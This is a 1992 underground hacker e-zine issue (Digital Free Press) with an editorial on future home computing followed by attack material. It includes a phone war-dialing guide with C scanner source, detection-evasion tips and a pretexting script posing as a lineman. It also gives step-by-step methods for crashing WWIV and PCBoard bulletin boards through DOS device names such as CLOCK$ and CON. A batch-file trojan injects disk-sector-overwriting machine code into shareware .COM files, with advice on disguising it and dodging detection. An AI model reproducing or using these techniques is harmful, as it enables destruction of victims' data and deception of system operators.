Copy Link
Add to Bookmark
Report
Digital Free Press Vol 1 Issue 1
######### ############ #########
########### ############ ###########
#### #### #### #### ####
#### #### #### #### ####
#### #### ######## ###########
#### #### ######## #########
#### #### #### ####
#### #### #### ####
########### #### ####
######### #### ####
DIGITAL FREE PRESS
-------------------------------------------------------------------------------
V 1.0 Issue 1.0 January 1992
-------------------------------------------------------------------------------
* A Publication of The Underground Computing Foundation (UCF) *
* Send Submissions to: underg!hackers@uunet.uu.net *
* Editor: Max Cray (underg!max@uunet.uu.net) *
* BBS: The Underground (401) 841-5607 (v.32) *
------------------------------------------------------------------------------
In this Issue:
1. _The Future Computer_ Editorial by Max Cray
2. Phone Number Scanning by GodNet Raider
3. Fun with the CLOCK$ device driver by The Riddler
4. Homegrown Trojan by The BBC
------------------------------------------------------------------------------
The Future Computer
by Max Cray
In the future, your computer will be a standard household appliance,
like your water heater. It will probably be sitting in a back closet someplace
rarely seen. It will come with your house. Your house will also have a built
in local area network, and there will be terminals in almost every room.
The distinction between television, radio, and computer networks will
disappear, as the computer becomes the audio, and visual controller. Your
television will be a peripheral to your computer. It will receive from a cable
and feed into your computer, where you will be able to watch TV from any of the
terminals in the house. The terminals will consist of a monitor, probably with
a slot for a floppy disk, and a keyboard. Your stereo will also be a
peripheral to your computer but specialized music media will disappear as
music, movies, and new forms of entertainment will be distributed digitally on
normal computer disks, or through the network. Your video camera will also
become a computer PERIPHERAL, and the variety of programming will increase
exponentially, as private individuals will be able to create their own
programming to post on the audiovisual network, for all to experience. There
will be national audiovisual networks, and small private networks, similar to
computer bulletin boards of today, but they will be more like personal TV
stations. Those that watch will also contribute to programming, both real time,
and stored. You will be able to have your computer capture any real time event
you missed for storage, for you to later experiencing, editing, etc. You will
be able to send audio, and audiovisual mail, but normal electronic mail will
stay as many will not want to be seen or heard, especially early in the
morning.
There will be some political decisions to make, as those who control the
national computer networks will become very powerful, and freedom of expression
issues will continue to crop up, as there will be some who call for regulation.
However the power of the national networks will be leveraged by many smaller
networks, which will in fact have gateways to each other.
There will be centers for the treatment of those addicted to computers.
Your spouse will think it none too soon.
All the technology I have discussed already exists. The prime factor that
is preventing the changes to society is the cost of the technology. As we all
know, the cost of technology is always dropping. The speed that society
changes is directly related to the speed that the cost of technology drops.
-------------------------------------------------------------------------------
To: hackers@underg
Subject: Scanning.
From: gnr@tsf.UUCP (GodNet Raider)
Organization: The CyberUnderground
-=[ Intelligent Phone Number Scanning ]=-
-or-
/**********************************************/
/* How to find the number you are looking for */
/* without the help of a friendly operator. */
/**********************************************/
- written by -
GodNet Raider
- of -
The CyberUnderground
-=[ "Information is the greatest weapon of power to the modern wizard." ]=-
]----------------------------------------------------------------------------[
Introduction:
-------------
This phile is written to help in the eternal search for a place to jack
in. It contains tips that will help to make the most use of phone number
scanners and to better target a particular system.
Scanning Tools Needed:
----------------------
The only tools needed is a computer, phone number scanner software, and a
computer modem. The scanner program is one that dials numbers though your
modem under a given prefix and reports if a carrier (the signal that your
modem is connected to another modem) was found or not. There are a lot of
programs out there that will do this function nicely but for you obsessed
prodigies out there the source code for a simple scanner is provided at
the end of this phile.
Scanning Tips:
--------------
1) When looking for a particular system (company, school, etc..) keep in
mind the "+/- ten rule". This rule simply states that most jacks will
be found within ten (+/-) sequential instances from the normal
business phone number. In larger corporations this could be as much
as twenty (+/-). So to find a site with a business number at 555-1212
the scanner should start at 555-1202 and try the next twenty
instances (555-1202 to 555-1222) or ten below and above the base
number. It should also be noted that in places that had the system
installed long after it was established this system may not work. But
due to the great size and expense of some systems they are installed
day one, so the numbers are assigned to that site (voice, Data, fax,
etc..) sequentially.
2) Also in areas with more than one prefix (746, 747, 748) older sites
will be found on the lower prefixes (746/747), while newer
installations will be found on the higher ones (747/748).
3) Scanning should be done in small bursts to avoid alerting the PhoCo
to what you are up to. This means having the scanner only call about
3 numbers in a burst then wait 5 - 10 minutes for the next burst. It
is also a good idea to do no more than 50 tries every other day.
4) Don't go jacking right after finding a system. It is good practice to
wait a few days to allow any possible suspicion to wane.
It is easer to explain a seemingly one time jacking as "... Sorry,
must have misdialed a local bbs number. But I did hang up right away
as not to break any <sic> laws..." Than it is to explain why you
misdialed the number 50 times in less than 30 minutes.
5) Social Engineering is always an last resort. Calling the sites
business number between 12:30 and 1:30 will allow for the regular
sysadmin to leave for lunch leaving an intern or other busy/hurried
employee (who does not have the time to talk) to answer your inquiry.
Tell the person on the other end something like the following.
"Hello, This is linemen Xxxxxxx. I am out here at the junction
box and am tracing the line noise problem you reported. The
number on my service request does not show data equipment on that
line (give the number you are calling at this time)..."
If all goes well you should get a response like the following...
"Oh it seems you people at the PhoCo have screwed up (everyone
likes to take an elitist attitude toward the PhoCo. An love to
point out errors and correct them). You have the business number
listed as the system number(s). The system number(s) is/are..."
Scanner Source Code:
--------------------
The following source was written for the IBM pc/clones. As much ansi 'c'
was used as possible, but system specific information (like port i/o) has been
set off into specific functions so that it can be converted to other systems
without having to reinvent the wheel. This program takes information from
the command line and writes output to standard i/o.
+---- Cut Here ----+---- Cut Here ----+---- Cut Here ----+---- Cut Here ---+
/*
scanner.c
by GodNet Raider
It is assumed that the serial port and modem have already been setup.
Com 1 & 2 only supported.
*/
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#define FALSE 0
#define TRUE 1
#define DTR_ON(x) outp(anBCom[x]+4,0x03)
#define DTR_OFF(x) outp(anBCom[x]+4,0x00)
#define CTS(x) inp(anBCom[nPort]+5)&0x0020
#define DATA_READY(x) inp(anBCom[x]+5)&0x0001
char
*aszError [] =
{
"\nUsage: SCANNER <Port #> <PreFix> <Start #> <Count>\n"
"\tPort # - Serial port number to use.\n"
"\tPreFix - Static part of phone number(ie. 1-800-555-, 846-, etc..).
\n"
"\tStart # - last 4 digits of phone number (ie. 1212, 0065, etc..).\n"
"\tCount - Number of instances (single stepped) to scan.\n",
"\nNumbers are out of range.",
"\nModem error."
},
*aszTarget [] =
{
"connect",
"busy"
};
unsigned int
anBCom [] =
{
0x3f8,
0x2f8
};
unsigned int
Call (unsigned char, char*),
receive_chr (unsigned long, unsigned char),
send_chr (unsigned char, unsigned char);
void
FatalError (int),
main (int, char**),
Wait (unsigned long);
void main (argc, argv)
int
argc;
char
*argv [];
{
char
szWork [128];
unsigned char
nPort;
unsigned int
nPrsNum,
nEndNum;
if (argc < 5)
FatalError (1);
nPort = (unsigned char) atoi (argv [1]) - 1;
nEndNum = (nPrsNum = atoi (argv [3])) + atoi (argv [4]);
if (nPrsNum > 9999 || nEndNum > 9999 || nEndNum <= nPrsNum || nPort > 1)
FatalError (2);
while (nPrsNum != nEndNum)
{
printf ("%s%04i : ", argv [2], nPrsNum);
sprintf (szWork, "ATX4Q0V1DT%s%04i\r", argv [2], nPrsNum++);
printf ("%sCarrier Found\n", (Call (nPort, szWork) ? "" : "No "));
}
exit (0);
}
unsigned int Call (nPort, ptDialStr)
unsigned char
nPort;
char
*ptDialStr;
{
unsigned long
nWait;
unsigned int
nTmpCnt,
nResChr,
nRetCode = FALSE;
char
fCont = TRUE,
szWork [256] = "",
*ptWork;
DTR_ON (nPort);
Wait (5);
while (*ptDialStr)
if (send_chr (*ptDialStr, nPort))
ptDialStr++;
else
if (!(receive_chr (1l, nPort) & 0xff00))
{
outp (anBCom [nPort] + 4, 0x00);
FatalError (3);
}
ptWork = szWork;
nWait = time (NULL) + 30;
while (time (NULL) < nWait && fCont)
{
if ((nResChr = receive_chr (1l, nPort)) & 0xff00)
{
*(ptWork++) = (char) tolower (nResChr & 0x00ff);
*ptWork = 0x00;
for (nTmpCnt = 2; nTmpCnt && fCont; nTmpCnt--)
if (strstr (szWork, aszTarget [nTmpCnt - 1]))
{
if (--nTmpCnt)
printf ("[%s] ", aszTarget [nTmpCnt]);
nRetCode = !nTmpCnt;
fCont = FALSE;
}
}
}
DTR_OFF (nPort);
Wait (5);
return nRetCode;
}
unsigned int send_chr (cCh, nPort)
unsigned char
cCh,
nPort;
{
if (CTS (nPort))
{
outp (anBCom [nPort], (int) cCh);
return TRUE;
}
return FALSE;
}
unsigned int receive_chr (nWait, nPort)
unsigned long
nWait;
unsigned char
nPort;
{
nWait += time (NULL);
while (time (NULL) < nWait)
if (DATA_READY (nPort))
return ((inp (anBCom [nPort]) & 0x00ff) + 0x0100);
return FALSE;
}
void Wait (nWait)
unsigned long
nWait;
{
nWait += time (NULL);
while (time (NULL) < nWait);
}
void FatalError (nErrorNum)
int
nErrorNum;
{
printf (aszError [nErrorNum - 1]);
exit (nErrorNum);
}
+---- Cut Here ----+---- Cut Here ----+---- Cut Here ----+---- Cut Here ---+
]============================================================================[
Date: 08-03-91 (01:37) Number: 111 of 124
To: ALL Refer#: NONE
From: <SENSORED> Read: (N/A)
Subj: URGENT Status: PUBLIC MESSAGE
Conf: SYSOPS (5) Read Type: GENERAL (-)
*** ATTENTION MS-DOS BASED SYSTEM OPERATORS ***
This message is not a joke, scare, or farce. Read carefully and please
take precautions to prevent potential damage to your system.
A RI sysop has found [with the help of a local hacker - Ed]
a quite serious problem which appears to be in DOS.
The release of this information has to be done VERY carefully because of
the potential damage which can be done to bbs systems. (maliciously)
IF YOU WANT TO PREVENT DAMAGE TO YOUR SYSTEM:
Disable uploads with the pattern of CLO*.* immediately. If you do not,
you run the risk of not only crashing the board but losing your CMOS
configuration as well. This has been tested with 3 different PCBoard
systems, and they were affected immediately. This bug also affected the
tested computers in a non bbs environment (ie in DOS).
If you would like further information, please arrange a private voice
call or page during the day Saturday. Remember, we have to be very
careful about this information getting out there until this is addressed
and proper precautions have been taken by ALL sysops.
This problem is not a virus, trojan, or a particular file.... It is a
file NAME which causes this corruption of cmos configurations in 80286+
class machines, regardless of the file contents... The actual filename
has been PURPOSELY omitted from this message. Feel free to distribute
this notification to any other PRIVATE sysop base in the area. Note:
This should not be posted publicly, as it could be a potential security
problem and there are likely others that have not been discovered as of
yet. Please take any necessary precautions to protect your system.
[Editor's note: It's not that hard to run a MEM with the /d flag to find
the CLOCK$ device driver.]
--------------------------------------------------------------------------
Subject: Phrack 35
From: riddler (The Riddler)
In Phrack 35 a letter from The Dark Lord Sarik Malthus asking for the
justification of hacking: "...in your mind justify the actions of hackers..."
He runs a small bulletin board (running WWIV v.4.20) with an oppressive
fashion. He censors email and very strictly dictates behaviour on his BBS.
He does this, not by any social standards but by his own, which I admit is
admirable...but not when it suppresses FREEDOM OF INFORMATION. The experience
he has had with hackers was primarily with me crashing his board by repeatedly
finding bugs in the WWIV system. I tried every technique explained in
Phrack 34 with no success. However, I am writing to explain a few ways of
harmlessly and temporarily crashing any WWIV and most other BBS packages.
In the MS-DOG environment we are endowd with a few devices such as:
COM1, COM2, AUX, PRN, CON, and CLOCK$, yes there is such a device.
Previous to Dark Lord's upgrade to version 4.20 of WWIV he was running version
4.12.
Here are two ways to crash that system:
Note: Use XMODEM OR ASCII PROTOCOLS, NOT ZMODEM OR YMODEM.
- #1 -
Goto to the file xfer section.
Choose to upload a file.
When propted with the filename, type COM2 (most likely where his modem is).
Finding this device as a file, WWIV asks if you would like to add that
filename to the file database; say yes.
At that point the file "COM2" will appear as a file available for download.
Download it.
Woooops. A big problem occurs when MS-DOG attempts to read from and write
to the same device name simultaniously. Oh well.
What will most likely happen is either a hardware lock-up or a dos
error message like "Write fult error reading COM2, Abort, Retry...."
Both require that a sysop do something to get the system back up.
- #2 -
Again, goto the file xfer section.
Choose to upload a file
When prompted with the name say you want to upload clock$.zip (ext. does not
matter). Upload any 'ol file on your harddrive, at least 6 bytes or so.
That upload will be fed directly to his clock as a new time setting. The bytes
being rather random, so will the new date/time. When you complete the xfer
WWIV attempts to find out how long you have been xfering for and how much
time you have left for that session and completely keels over.
It will not recover until the sysop has rebooted and reset the clock
or the CMOS-clock (if he has CMOS).
Clean cut and annoying.
- #3 - (not very thoroughly tested but should word)
Everything the same as in the previous to cracks up to the device name.
This time upload CON.
Upload your favourite ansi bombs and remap often used keys to =
nasty dos commands or whatever...on the
remote system's keyboard. Hopefully the sysop will have loaded, the
regular ansi.sys that comes with DOS. This is being fed directly
to his CON -- his keyboard/screen. Try to do this while the sysop
is in bed.
------------------------------------------------------------------------------
But oh no! Version 4.20 of WWIV came out. What will we do now?
It now prevents users from uploading files by the names of devices
altogether.
Try these techniques:
------------------------------------------------------------------------------
- #4
Create a zipfile containing a file of no less than 6 bytes (again) with a name
of exactly 6 char's. Then, using your favourite hex editor open your zipfile
and change the two occurences of your chosen filename of the file in the
zipfile to "ClOck$" (not case sensitive).
After the upload is completed goto the archive menu (a submenu off of the xfer
menu). Choose to extract a file within your zipfile temporarily. Extract the
clock$ within your freshly uploaded zipfile. WWIV, with the assistance of
PKzip will extract the contained clock$'s contents and spew every byte right
into the clock$ device again. Clock/cmos screwed again. Locking crashing the
board and locking the computer up. Woops.
#5
Or try this:
Goto the archive menu in xfer section
choose to (A)dd a file to a temporary archive
then, guess what? choose clock$.
WWIV, again with help from PKzip will (this time) read (not write) from
the clock$. Since it will never reach the EOF it is looking for, as it
would in a regular file WWIV keels over again. In this process messing
the clock up thoroughly. Locking the board and/or computer up.
--------------------------------------------------------------------------
| Uploading clock$ works also, on all PCBoard's versions 14.5 and lower. |
--------------------------------------------------------------------------
I have more BBS crashing techniques if you would like them.
Other BBS's different techniques.
Happy Cracking and a Happy Crashed Year.
>From of The Underground Computing Foundation.
The Riddler
underg!riddler@uunet.uu.net
[Editors Note: The UCF does not condone destructive actions. This material
is distributed to help sysops protect themselves from dangerous
users like The Riddler.]
------------------------------------------------------------------------------
Subject: Fun...
From: bbc (the bbc)
So you say your bored... Want to do somthing but not sure what...
Well how about crashing a smug WWIV sysop!
Why not not make a trojan [We mean the horse type] and send it
to them. How you say... Well not that weeeeeee... would condone such
an act..... But for information purposes only we will give you the
method to our maddness...
Step 1:
Make a batch file called "INJECT.BAT" and in it place
the following commands -
============================================================
echo off
cls
echo e cs:0100 b4 19 cd 21 b9 09 00 33 d2 cd 26 > ~~temp.~tp
echo w >> ~~temp.~tp
echo q >> ~~temp.~tp
debug %1 < ~~temp.~tp > nul
erase ~~temp.~tp > nul
==============================================================
Step 2:
Then copy a *.COM file into the same directory. Should
be part of some shareware thing that the sysop would like.
With docs an all... would not want them to get suspicious,
now would we.............
Step 3:
Run the following command from the dos prompt...
INJECT <COM file to inject with trojan>
Step 4:
Re- zip, arc, lharc, zoo, ect... the thing with it's
other files...
Step 5:
Upload the mess to the unsupecting sysop and watch the fun!
See and you thought hacking was hard...... Of course if thay
get smug and start searching for the injected code.... We'll just have
to add extra code (nops' ect) and switching some of the code around...
Next lesson How to bypass Disk protect programs and WWIV door
security.... Dont miss it.... Same bat time! Same bat channel!
The BBC
-------------------------------------------------------------------------------
[Editors note: In case you missed that BBC hack here it is disassembled:
0100 B419 MOV AH,19 'Get Default Drive
0102 CD21 INT 21 'Call DOS
0104 B90900 MOV CX,0009 'Write 9 Sectors
0107 33D2 XOR DX,DX 'Starting as sector 0
0109 CD26 INT 26 'Absolute Disk Write (Oouch!)
And thats all she wrote...
You can protect yourself from software that does this by using a utility
like MIRROR or IMAGE.]
Keep those letters coming...
The End